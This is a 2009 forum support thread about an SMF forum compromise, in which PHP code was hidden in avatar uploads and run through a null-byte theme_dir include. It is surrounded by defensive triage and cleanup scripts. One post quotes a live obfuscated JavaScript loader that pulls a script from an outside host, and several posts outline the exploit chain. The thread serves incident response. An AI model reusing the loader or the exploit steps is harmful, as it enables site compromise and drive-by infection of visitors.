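//   php smf_triage.php /path/to/forum           report only
//   php smf_triage.php /path/to/forum --clean   also strip the injected line

// The line prepended to every PHP file, as quoted above: an
// eval(base64_decode('...')) statement wrapped in its own PHP tags.
const INJECT_RE = '~^<\?php\s*/\*\*/\s*eval\(base64_decode\(\'([A-Za-z0-9+/=]+)\'\)\);\s*\?>\r?\n?~';

/** Regular files under $dir; restricted to the given extensions when $exts is non-empty. */
function listFiles(string $dir, array $exts = []): array
{
    $out = [];
    $it  = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $info) {
        if ($info->isFile() && ($exts === [] || in_array(strtolower($info->getExtension()), $exts, true))) {
            $out[] = $info->getPathname();
        }
    }
    return $out;
}

/** Dropper path named by an injected file's payload, or null when the file is clean. */
function injectedDropper(string $path): ?string
{
    $head = file_get_contents($path, false, null, 0, 65536);
    if ($head === false || !preg_match(INJECT_RE, $head, $m)) {
        return null;
    }
    $stub = base64_decode($m[1], true);
    if ($stub === false) {
        return '(payload not valid base64)';
    }
    // The decoded stub does include_once('<dropper>') before installing its ob_start() hook.
    return preg_match("~include_once\\('([^']+)'\\)~", $stub, $d) ? $d[1] : '(no include_once in payload)';
}

/** Remove the injected first line so the file again starts at byte 0 with its own <?php tag. */
function cleanInjected(string $path): bool
{
    $src = file_get_contents($path);
    if ($src === false || !preg_match(INJECT_RE, $src)) {
        return false;
    }
    $fixed = ltrim(preg_replace(INJECT_RE, '', $src, 1));
    // Refuse to write anything that no longer looks like a PHP file.
    return strpos($fixed, '<?php') === 0 && file_put_contents($path, $fixed) !== false;
}

/** Uploads containing a PHP open tag, whatever their extension (the avatar trick). */
function uploadsWithPhp(string $dir): array
{
    $hits = [];
    foreach (listFiles($dir) as $f) {
        $data = file_get_contents($f);
        if ($data !== false && strpos($data, '<?php') !== false) {
            $hits[] = $f;
        }
    }
    return $hits;
}

$root  = $argv[1] ?? '';
$clean = in_array('--clean', $argv, true);
if (!is_dir($root)) {
    fwrite(STDERR, "usage: php smf_triage.php /path/to/forum [--clean]\n");
    exit(1);
}

$droppers = [];
foreach (listFiles($root, ['php', 'php3', 'phtml']) as $f) {
    $dropper = injectedDropper($f);
    if ($dropper === null) {
        continue;
    }
    echo "INJECTED  $f  ->  $dropper\n";
    $droppers[$dropper] = true;
    if ($clean) {
        echo '          ' . (cleanInjected($f) ? "cleaned\n" : "NOT cleaned, inspect by hand\n");
    }
}
foreach (array_keys($droppers) as $d) {
    echo "DROPPER   $d  " . (file_exists($d) ? "(present: remove it, or the injection returns)\n" : "(not found)\n");
}
if (is_dir("$root/attachments")) {
    foreach (uploadsWithPhp("$root/attachments") as $f) {
        echo "PHP IN UPLOAD  $f\n";
    }
}
```

Run it read-only first and back up the tree before `--clean`; as the first post in the thread shows, stripping the prepended line without removing the dropper file it names just lets the infection come back.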
Title: Re: Hacked, script injection
Post by: crash56 on May 12, 2009, 03:50:52 PM
Theoretical question here, because I'm getting all of this straight in my mind ...

If we were to get hit by this hacker, and we had a recent clean backup of all our files, we could just reupload those ... yes?  Or does this code get into the database in some way so we would have to clean that up as well?
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 03:57:29 PM
So far, this hack only affects the /Sources and /Themes files as well as the affected avatar. To my knowledge, having worked with members on this hack for the past week or so, I have yet to find any damage done to the database.

The one thing that has saved members was backing up their files by simply downloading the entire SMF installation, minus the database, to their hard drive once a day.

Then, if you feel you have been hacked, take your forum offline, upload the backed up files making sure the old ones are overwritten, and voila!
Title: Re: Hacked, script injection
Post by: crash56 on May 12, 2009, 03:59:50 PM
Great!  Thanks!  (No, we're not going to drop all defenses. ;) )
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 04:16:23 PM
I have a question - is this hack simply an avatar upload and the forums wrecked?

I mean, can any Joe Shmoe get a hold of this avatar and use it without "skills"?

That's a good question. But for now, it has been limited to only a few usernames such as "krisbarteo" and "MagicOPromotion" among a few others.

But yes, it is a good point to bring up as so far it is a generic 1x1 avatar that is masked with either a .jpg or .gif extension, but contains php code.

I will look into it.
Title: Re: Hacked, script injection
Post by: matthieu on May 12, 2009, 04:22:56 PM
Hi,

Thanks for this topic !
I have this problem with the member named above (krisbarteo) and his avatar was indeed encapsulated PHP ...

My error was to set CHMOD 777 on the attachment directory ... Shame on me ...
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 04:29:52 PM
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: matthieu on May 12, 2009, 04:37:49 PM
yes Jblaze, thx. I read it and applied changes.
Title: Re: Hacked, script injection
Post by: Agafonov on May 12, 2009, 06:02:29 PM
Or does this code get into the database in some way so we would have to clean that up as well?

Analyzing DB dump:
The user (krisbarteo) has set theme_dir to ./attachments/avatar_46455.jpg\0 (note the character code zero at the end).
Then requests (according to the error log) to ?action=theme;sa=pick;u=46455;sesc led to execution of the avatar as PHP in an include() call inside the theme handling code.
Quote
8: Use of undefined constant php - assumed 'php'<br />File: /nfs/www/ru/forum/htdocs/attachments/avatar_46455.jpg<br />Line: 1

How the value of theme_dir appeared in the smf_themes table is the main question.
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 09:00:07 PM
I have all the code on top..but I can not find his avatar at all.
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 10:54:39 PM
OK. I removed all code up top and now I only get the top half of my website..  :( my back up was the one I removed it from. Is there something I missed? It is the Sources that has caused this. My admin is still there and working but nothing else.
I just removed and uploaded.
Any ideas?
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 11:11:26 PM
Make sure that you did not leave a space at the top of each file.

<?php must be the first line
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 11:18:34 PM
Bugger.. I bet I overwrote settings.php..
Title: Re: Hacked, script injection
Post by: dcmouser on May 13, 2009, 05:53:42 AM
OK, so we did some investigating on our forum to see how vulnerable we were to this attack; Agafonov's discovery was a big help in understanding what was going on.

Let me summarize what I think I understand, pieced together from several places and from going through the code.

The attack is a multi-step attack:

FIRST, the user uploads an avatar image (or an attachment on a post), it doesn't really matter, and it doesn't have to be an image I don't think.
The goal here is for them simply to get their payload php script onto your server.

SECOND, they trick the forum code into INCLUDING their payload php file while it's running other php code.

This second part is the tricky part, and it's what makes some of the potential fixes suggested in this thread useless.

The original method that they use to execute the file payload was described back in November 2008, as can be seen in this thread:
http://www.simplemachines.org/community/index.php?topic=272393.20

The basic idea is that the evil user tells the SMF forum to INCLUDE a file from the CUSTOM theme directory (variable theme_dir).  And then they bring up one of the pages on the forum that actually loads a file in the theme dir.

By setting the theme_dir to the file path of their malicious fake image file (with a \0 on the end of it as seen above), the malicious user actually tricks the SMF forum into parsing the fake image file and executing the PHP in it directly.

---

Now, the part that makes this a bit messy to fix is that there are NUMEROUS places in SMF where a user's custom 'theme_dir' variable can be set, and numerous places where it is used.

It seems to me that most of these were fixed in earlier SMF releases.. *BUT* a few remain(!) and that is how this exploit is still occurring.

---

[the truth is that users should NEVER be allowed to customize their theme_dir -- this is a flaw in SMF and should be remedied]

I'm offering some fixes we did locally, but I'm not guaranteeing this will fix all the risk -- and I hope SMF people will follow up.

The first fix will prevent the Theme Picker from using custom user theme_dir variables, which should prevent this particular exploit even for users who previously modified their variable in an effort to hack your forum.  This one is the most important quick fix and should solve this particular exploit:

In Themes.php, FIND:
      $request = db_query("
         SELECT ID_THEME, variable, value
         FROM {$db_prefix}themes
         WHERE variable IN ('name', 'theme_url', 'theme_dir', 'images_url')" . (empty($modSettings['theme_default']) && !allowedTo('admin_forum') ? "
            AND ID_THEME IN ('$knownThemes')
            AND ID_THEME != 1" : '') . "
            AND ID_THEME != 0
AND ADD AT THE END
            AND ID_MEMBER = 0



The second fix will prevent new changes to users theme_dir variable (but not correct existing changes that evil members already set).
I'll leave it for someone else to go into more details since I'm running low on sleep, but basically:
In Profile.php, go into the makeThemeChanges function
and inside both loops through $_POST['options'] and $_POST['default_options']
add a line inside the loops saying:
         if (strpos($opt,'_dir')!==FALSE || strpos($opt,'_url')!==FALSE)
            continue;


---

There are 2 more things you can do:
search the smf database, the themes table
for rows where variable=theme_dir

the hits are users who have tried to use this exploit.

DELETE THESE ROWS -- after noting the filenames and userids.

now I'd say don't panic when you find entries there -- but DO go check out the files uploaded by these users (you'll see them listed in these rows), and make sure you don't find really evil php code in any of them..  those tables will also tell you which exact users uploaded the files and attempted to run exploits.  then delete those attachment files.

---

hope that's at least some use -- sorry it's not explained better but we just spent a few hours on this right before we planned on sleeping, so I'm just rushing to explain what we found in time to be useful to someone.

and note that none of the instructions above will do anything to CLEAN a system that has actually been exploited by this attack by someone who put really malicious code in one of the payloads.
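The table audit and the two code-level rules from the post above, as an added example (Python over an in-memory sqlite3 stand-in for the themes table; this is not SMF code): constructed rows, an audit that lists what the post says to note and delete (theme_dir/theme_url/images_url rows owned by a member, or any value carrying the \0 terminator), the theme-picker SELECT with and without the post's `AND ID_MEMBER = 0`, and the Profile.php `_dir`/`_url` rejection rule. Column names ID_THEME, variable, value and ID_MEMBER are the post's; the table name smf_themes is the default prefix mentioned later in the thread.

```python
"""Audit an SMF 1.1 themes table for member-owned theme_dir rows.

Added example, not SMF code. All rows below are constructed sample data.
"""
import sqlite3

# Variables that must only ever exist forum-wide (ID_MEMBER = 0).
PATH_VARIABLES = ("theme_dir", "theme_url", "images_url")

# Constructed sample rows: (ID_MEMBER, ID_THEME, variable, value).
SAMPLE_ROWS = [
    (0, 1, "name", "SMF Default Theme"),
    (0, 1, "theme_dir", "/home/example/public_html/forum/Themes/default"),
    (0, 1, "theme_url", "http://forum.example/Themes/default"),
    (0, 1, "images_url", "http://forum.example/Themes/default/images"),
    (0, 2, "name", "Babylon"),
    (0, 2, "theme_dir", "/home/example/public_html/forum/Themes/babylon"),
    # A harmless per-member display option.
    (42, 1, "show_board_desc", "1"),
    # The pattern from the post: a member-level theme_dir pointing at an
    # uploaded file, with the \0 terminator the post describes on the end.
    (4711, 1, "theme_dir",
     "/home/example/public_html/forum/attachments/fake_avatar\x00"),
]


def build_sample_db():
    """In-memory stand-in for the forum's themes table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE smf_themes ("
        " ID_MEMBER INTEGER NOT NULL DEFAULT 0,"
        " ID_THEME INTEGER NOT NULL DEFAULT 1,"
        " variable TEXT NOT NULL,"
        " value TEXT NOT NULL)")
    conn.executemany("INSERT INTO smf_themes VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def find_suspicious_rows(conn):
    """Rows the post says to note (file name, member id) and then delete:
    path variables owned by a member, plus any value carrying a NUL byte."""
    cur = conn.execute(
        "SELECT ID_MEMBER, ID_THEME, variable, value FROM smf_themes")
    hits = []
    for id_member, id_theme, variable, value in cur:
        member_owned_path = variable in PATH_VARIABLES and id_member != 0
        if member_owned_path or "\x00" in value:
            hits.append((id_member, id_theme, variable, value))
    return hits


def theme_picker_rows(conn, hardened=True):
    """The SELECT the theme picker runs. With hardened=True it carries the
    post's extra 'AND ID_MEMBER = 0', so member-owned rows never feed the
    include path."""
    sql = ("SELECT ID_THEME, variable, value FROM smf_themes"
           " WHERE variable IN ('name', 'theme_url', 'theme_dir', 'images_url')"
           " AND ID_THEME != 0")
    if hardened:
        sql += " AND ID_MEMBER = 0"
    return conn.execute(sql).fetchall()


def is_allowed_profile_option(name):
    """The Profile.php rule from the post: members may not set any option
    whose name contains '_dir' or '_url'."""
    return "_dir" not in name and "_url" not in name


def main():
    conn = build_sample_db()
    for id_member, id_theme, variable, value in find_suspicious_rows(conn):
        print(f"suspicious: member={id_member} theme={id_theme} "
              f"{variable}={value!r}")
    print("picker rows, unpatched:", len(theme_picker_rows(conn, False)))
    print("picker rows, hardened :", len(theme_picker_rows(conn)))


if __name__ == "__main__":
    main()
```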
Title: Re: Hacked, script injection
Post by: Kindred on May 13, 2009, 08:18:08 AM
DO be aware that the development team IS working on fixing this in the code and will release a security update once the fix is tested and confirmed.
Title: Re: Hacked, script injection
Post by: kwah on May 13, 2009, 09:09:44 AM
DO be aware that the development team IS working on fixing this in the code and will release a security update once the fix is tested and confirmed.
We kinda suspected it.

Any indication on ETA would be very much appreciated by a lot of people I guess. Uncertainty is one of the worst things, you know...
Title: Re: Hacked, script injection
Post by: DirtRider on May 13, 2009, 10:14:24 AM
I have made contact with this hackers ISP here is the reply

Quote
thanks for you reporting.

1. Please tell more information about this action, domain name (-s) or IP address (-es) of your website, which has suffered?
2. IP address (-es) who attacked your website?

We investigate this action and we'll do anything to avoid this problem in future.

So if you want to PM me your info I will compile a list and send it along to them for investigation. Also include the time more or less that the hack took place 
Title: Re: Hacked, script injection
Post by: GamingTrend on May 13, 2009, 02:27:06 PM
Should there be files in /Themes/babylon/topic/? 

I'm seeing a BUNCH of files named stuff like 0826864081449d624837cae95c04d304 instead of my hot_poll.gif type files....

Title: Re: Hacked, script injection
Post by: Edvard on May 13, 2009, 02:41:42 PM
I'd just like to add that I also had a Hacktool.Rootkit on the pc I use for administrating my website. I solved this first, and then, when the whole site was taken off-air, I asked my webhoster to change the passwords for the ftp and mysql. After that I uploaded the site again and since then the site hasn't been infested by bad php-code anymore.

Btw, I have the idea that Krisbarteo never got to upload an avatar on my site, yet I got all this trouble anyway...
Title: Re: Hacked, script injection
Post by: GamingTrend on May 13, 2009, 02:45:28 PM
Should there be files in /Themes/babylon/topic/? 

I'm seeing a BUNCH of files named stuff like 0826864081449d624837cae95c04d304 instead of my hot_poll.gif type files....



I deleted them all just to be sure anyway.  I don't like randomly named files that span roughly 3000 different names.  Let's hope that my cleanup worked.
Title: Re: Hacked, script injection
Post by: justjim on May 13, 2009, 03:41:17 PM
He has hit our forum as well.

I have been cleaning for 2 days. I thought I got all of the code out of the files, but these problems remain:

Some of our members' avatars have failed to display, as well as the random letter code that is supposed to be displayed on the registration screen.
The members whose avatars have disappeared are unable to upload a replacement avatar.
The avatars of the members whose avatars do not display are in the attachment folder. I have physically verified that they are there.
I have no error logs indicating an issue.

I have RT clicked 2 of the missing avatars->> properties; and this is what is displayed

http://sh.com/simplemachinesforum/index.php?action=dlattach;attach=270;type=avatar

http://sh.com/simplemachinesforum/index.php?action=dlattach;attach=813;type=avatar

I have Rt clicked the random letter code box ->> properties: and this is what is displayed.

http://sh.com/simplemachinesforum/index.php?action=verificationcode;rand=2157f0db0a2cbf8323e7f0fee5ee2fd1

Of course now, new members cannot register without a verification code. I feel somehow they are related

Can you please tell me where to look for the problem

By the way I have a sample of the 64 code, the infected avatar itself , the IP address 94.142.129.147 Latvia

And the code strings of the avatar if anyone wants a copy or any other info.
Title: Re: Hacked, script injection
Post by: M-DVD on May 13, 2009, 11:23:37 PM
1.- Here are some details about krisbarteo (http://www.stopforumspam.com/search?q=krisbarteo). Can somebody give me more data to report in SFS site? (and all the people using this DB will be immune from these users).

2.- If somebody has "the avatar uploaded" by this user, they should give it to the SMF Team (and me, XD, I have curiosity). (done (http://www.simplemachines.org/community/index.php?topic=307717.msg2046772#msg2046772), thanks :))

3.- There is another problem: how do the spammers run this file once uploaded?
Title: Re: Hacked, script injection
Post by: Filipina on May 14, 2009, 12:05:54 AM
Since I have an avatar upload on registration modification which I do not feel like messing with, I have disabled registrations. What if I just say screw it and take my chances, while saving a copy of all the files in my forum directory twice a day? If I get hacked can't I just upload all the clean files from my forum and all will be fine?
Title: Re: Hacked, script injection
Post by: Agafonov on May 14, 2009, 02:16:53 AM
3.- There is another problem: how do the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480
Title: Re: Hacked, script injection
Post by: Agafonov on May 14, 2009, 02:29:55 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simply overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no others are used by your mods, I'm not sure).
This will make sure that there is no hacker's code in your files.
But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.
Title: Re: Hacked, script injection
Post by: Edvard on May 14, 2009, 03:21:42 AM
Again, I'd like to add that my forum was hacked several times in a short time span (a few days), even though I completely deleted the forum and replaced it by a clean backup. Somehow, either through the php-script or via the rootkit.hacktool on my admin-pc, the ftp server password was compromised, and the site was hacked again overnight.

So, if your site is hacked, make sure your admin-pc is virus and malware free. Then delete your whole forum (make a backup of the infected forum if you wish, I did so I could put non-infected avatars and attachments, as well as other changes, back on-line), change the ftp and mysql server passwords, and upload clean forum software.

And, the most important lesson I've learnt is: MAKE BACK-UPS! This will be the last time I have to resort to a backup made almost one and a half years ago. I suggest making back-ups every time you change some of the php or html files, before upgrades/updates, and generally often enough to ensure attachments and avatars won't be lost.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 14, 2009, 12:52:16 PM
<<< But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.

You're not saying that the mere presence of this value is bad right? Meaning there is a legitimate one that's supposed to be there correct?
Title: Re: Hacked, script injection
Post by: stevefdl on May 14, 2009, 03:19:03 PM
I got hacked with a javascript between the head and body of my site. I tried re-installing, but nothing seems to work. Code is still there...anyone know if this is the same hack?

</head><script language=javascript><!--
(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
 --></script>
<body>
Title: Re: Hacked, script injection
Post by: Filipina on May 15, 2009, 01:17:42 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simply overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no others are used by your mods, I'm not sure).
This will make sure that there is no hacker's code in your files.
But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.

Ok thanks for the information. I did a search today of the main two user names being used in the attacks and the results are unbelievable. When you see the search results and site descriptions showing things like "poker" and "gaming" it must be too late for them. My registration will just remain closed until a patch comes out because I am not taking any chances. It is not only the infection itself, but I am sure Google will just blacklist your site once they crawl and find that mess. It is truly sad.
Title: Re: Hacked, script injection
Post by: Kindred on May 15, 2009, 01:35:29 AM
Actually, the statement is slightly incorrect.

uploading a clean set of files *WILL* help and will solve your immediate problems with the forum.  It will not, however, close any backdoors or other exploits that the hacker may have added. THOSE other files are the ones you need to delete.
Title: Re: Hacked, script injection
Post by: Jorin on May 15, 2009, 02:30:10 AM
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)
Title: Re: Hacked, script injection
Post by: crash56 on May 15, 2009, 05:43:11 AM
Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

They're working on it.  Kindred posted that they're working on a fix.  It's on page 8 of this thread. 

No ETA yet. 
Title: Re: Hacked, script injection
Post by: Jorin on May 15, 2009, 05:51:24 AM
Ah, thanks.  :)
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 15, 2009, 06:09:28 AM
Krisbarteo registered on my forum today,

Code: [Select]
krisbarteo - krisbarteo@gmail.com - 94.142.129.147 -  Today at 12:58:32

The "Stop Spammer" -mod marked all profile details as spammer, and stopped krisbarteo from completing the registration. So I can say that mod is a good choice for protecting your forums as well ;)

http://custom.simplemachines.org/mods/index.php?mod=1547

Some additional info:
The hostname of krisbarteo seems to be the same as IP,
and I have a gender option on registration, and krisbarteo selected male ;D
Title: Re: Hacked, script injection
Post by: agridoc on May 15, 2009, 06:54:34 AM
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded: http://www.motobit.com/util/base64-decoder-encoder.asp

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup, each PHP file has to be opened and the injected code deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.
Title: Re: Hacked, script injection
Post by: sponna on May 15, 2009, 02:32:24 PM
We got hit slightly differently it seems. The attacker managed to upload a file "attach.php" in the attachments directory together with the avatar exploit. He then created a htaccess file with a redirect to a file he either created or modified called readme_old. Somehow this combination created an iframe using our home page code but into which was called many different versions of drug selling stores. All of these urls were accessed from the attachments directory in the forum via the redirect in the htaccess file.

I'm still trying to work out what sequence of events led to the compromise - but it was almost certainly via the avatar or attachment upload. What worries me is that we had "encrypt file extensions" enabled so not sure how he invoked the file remotely. For sure I'd like to catch up with him!

I only found one file (readme_old) with the base64 code so far.

Pretty crap situation, particularly as Google crawled the vast array of urls and indexed them - we knew something was wrong when our bandwidth went sky high.
Title: Re: Hacked, script injection
Post by: Samker on May 15, 2009, 04:13:26 PM
I also found "KrisBarteo" in the member base but it looks like he didn't succeed in hacking us... At least I don't have anything unusual with my SCForum.

Can somebody please also check (and verify) whether everything is OK with the forum??


http://www.SCforum.info


Thanks in Advance!

S.
Title: Re: Hacked, script injection
Post by: Sarge on May 15, 2009, 04:18:02 PM
Can somebody please also check (and verify) whether everything is OK with the forum??

Your forum looks fine to me.
Title: Re: Hacked, script injection
Post by: Dzonny on May 15, 2009, 04:23:27 PM
Can somebody please also check (and verify) whether everything is OK with the forum??

Your forum looks fine to me.
I Agree... ;)
Title: Re: Hacked, script injection
Post by: Samker on May 15, 2009, 04:32:36 PM
Thank you guys...  :D

I'm now wondering why he didn't succeed with the hack, since he has been registered since 09 May 2009 and I have known about this "hole" for only a few hours??

I have tight settings (normal for the Security Forum which I run); maybe I could help others with protection... I mean we could compare settings and find differences between installed mods, enabled features etc. ??

Best Regards,

S.

Title: Re: Hacked, script injection
Post by: agridoc on May 15, 2009, 05:06:14 PM
Can somebody please also check (and verify) whether everything is OK with the forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.
Title: Re: Hacked, script injection
Post by: Samker on May 15, 2009, 05:21:46 PM
Can somebody please also check (and verify) whether everything is OK with the forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.

I already made a double check of all the mentioned things and everything seems OK.

Thanks for reply.
Title: Re: Hacked, script injection
Post by: M-DVD on May 15, 2009, 05:53:32 PM
3.- There is another problem: how do the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480


THANKS Agafonov, without your info I could never have found the trick  >:(

How the value of theme_dir appeared in the smf_themes table - that is the main question.

The guy is brilliant. I found the way just because I already knew it exists and searched the site.

I'm now wondering why he didn't succeed with the hack, since he has been registered since 09 May 2009 and I have known about this "hole" for only a few hours??

Perhaps because the guy has been busy :P
Title: Re: Hacked, script injection
Post by: Tiribulus on May 15, 2009, 05:59:07 PM
<<< I found the way just because I already knew it exists and searched the site. >>>

How would ya like to be a sterling citizen and share that with us? :)
Title: Re: Hacked, script injection
Post by: M-DVD on May 15, 2009, 06:09:23 PM
<<< I found the way just because I already knew it exists and searched the site. >>>

How would ya like to be a sterling citizen and share that with us? :)

No problem XD

I have found how to make the hack. Now I'm trying to replicate it in SMF 2 and in other potential sites. Then I will make the fix, and post the fix.
Title: Re: Hacked, script injection
Post by: Kindred on May 15, 2009, 07:14:14 PM
Once again, be aware that the SMF development team is working very hard on putting together an official security patch.
Title: Re: Hacked, script injection
Post by: Sabre™ on May 15, 2009, 09:21:38 PM
Someone had a snoop at one of my sites a few weeks back, but since that site is invite only, no glory.
I don't allow attachments/images uploaded, but I'm about to open a music site where upcoming/unknown artists may attach their mp3 files for users to listen to.
So I look forward to your patch team :)
Title: Re: Hacked, script injection
Post by: stardx on May 16, 2009, 08:04:31 AM
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded: http://www.motobit.com/util/base64-decoder-encoder.asp

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup, each PHP file has to be opened and the injected code deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.

dunno if you found a script by now, I have done just that with a simple find/sed shell routine recently.

Code: [Select]
nohup find /tmp/web13 -name "*.php" -exec grep "aWYoZnVuY3Rpb25" {} \; -print -exec clear.sh {} \; | grep tmp &

clear.sh:

Code: [Select]
#!/bin/bash
# Usage: clear.sh /path/to/file.php
# Drops the first line (the injected one), keeping the cleaned copy under
# /tmp/backup and the original beside the file as file.php.hack.

mkdir -p "/tmp/backup$(dirname "$1")"

sed -e '1d' "$1" > "/tmp/backup$1"

mv "$1" "$1.hack" 2>/dev/null

mv "/tmp/backup$1" "$1" 2>/dev/null

you could even do it with the "sed -i" command in one line; I had to copy/move all the files because I did it on a curlftpfs mounted device.
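The same job as agridoc's three-step wish list and stardx's find/sed routine, as an added Python example that is not code from either post: prompt for (or take) the string to search for, collect PHP files recursively, then strip the injected line from each, with the original copied to a backup tree first and a dry-run mode to preview what would change. Like the `1d` in clear.sh it assumes the injected code sits on lines of its own; unlike it, it only touches lines containing the marker, so clean files and injected lines that are not line 1 are handled. The default marker is stardx's base64 prefix from the grep above; everything else is constructed.

```python
"""Recursive cleaner for PHP files carrying an injected line.

Added example, not code from the thread. Assumes the injected code occupies
whole lines of its own and that the marker only occurs in injected lines.
"""
import os
import shutil
import sys

# stardx's grep pattern: the base64 encoding of "if(function".
INJECTION_MARKER = "aWYoZnVuY3Rpb25"


def find_php_files(root):
    """Step 2: walk the tree and collect every *.php path."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                found.append(os.path.join(dirpath, name))
    return sorted(found)


def strip_injected_lines(text, marker):
    """Drop every line containing the marker; return (cleaned, removed).
    A blind 'sed 1d' would also cut the first line of a clean file and
    miss an injected line placed anywhere but line 1."""
    kept, removed = [], 0
    for line in text.splitlines(keepends=True):
        if marker in line:
            removed += 1
        else:
            kept.append(line)
    return "".join(kept), removed


def clean_tree(root, marker, backup_root=None, dry_run=False):
    """Step 3: clean each PHP file in place. Before a file is rewritten the
    original is copied under backup_root, mirroring its relative path (the
    /tmp/backup layout of clear.sh). Returns {path: lines_removed} for the
    files that contain the marker; with dry_run=True nothing is written."""
    report = {}
    for path in find_php_files(root):
        # newline="" plus surrogateescape keeps the bytes we do not touch
        # exactly as they were, including CRLF line endings.
        with open(path, encoding="utf-8", errors="surrogateescape",
                  newline="") as fh:
            original = fh.read()
        cleaned, removed = strip_injected_lines(original, marker)
        if removed == 0:
            continue
        report[path] = removed
        if dry_run:
            continue
        if backup_root is not None:
            backup_path = os.path.join(backup_root, os.path.relpath(path, root))
            os.makedirs(os.path.dirname(backup_path), exist_ok=True)
            shutil.copy2(path, backup_path)
        with open(path, "w", encoding="utf-8", errors="surrogateescape",
                  newline="") as fh:
            fh.write(cleaned)
    return report


def main(argv):
    """usage: clean_php.py ROOT [MARKER] [BACKUP_DIR] [--dry-run]"""
    args = [a for a in argv[1:] if a != "--dry-run"]
    dry_run = "--dry-run" in argv
    if not args:
        print(main.__doc__)
        return 2
    root = args[0]
    # Step 1: the string to search for, from the command line or a prompt.
    marker = args[1] if len(args) > 1 else input("injected string to remove: ")
    backup_root = args[2] if len(args) > 2 else None
    report = clean_tree(root, marker, backup_root, dry_run)
    for path in sorted(report):
        print(f"{path}: {'would remove' if dry_run else 'removed'} "
              f"{report[path]} line(s)")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```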
Title: Re: Hacked, script injection
Post by: crash56 on May 16, 2009, 08:37:39 AM
KrisBarteo tried to register at our forum this morning.  We had the IP banned, so he didn't get in. 

Many thanks to everyone here for all the excellent information, and HUGE thanks to our webhost (GC Solutions) for sending around an e-mail warning all the SMF users about this hacker.  We would not have known about this threat if it weren't for that e-mail. 

*phew*  Disaster averted. 

<Heads back to the forum to continue shoring up defenses>

Title: Re: Hacked, script injection
Post by: FataMorgana on May 16, 2009, 09:02:39 AM
SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

Yes, don't know how long exactly this issue has been known but I discovered it just yesterday because my avatar disappeared... And the user krisbarteo already registered some weeks ago!
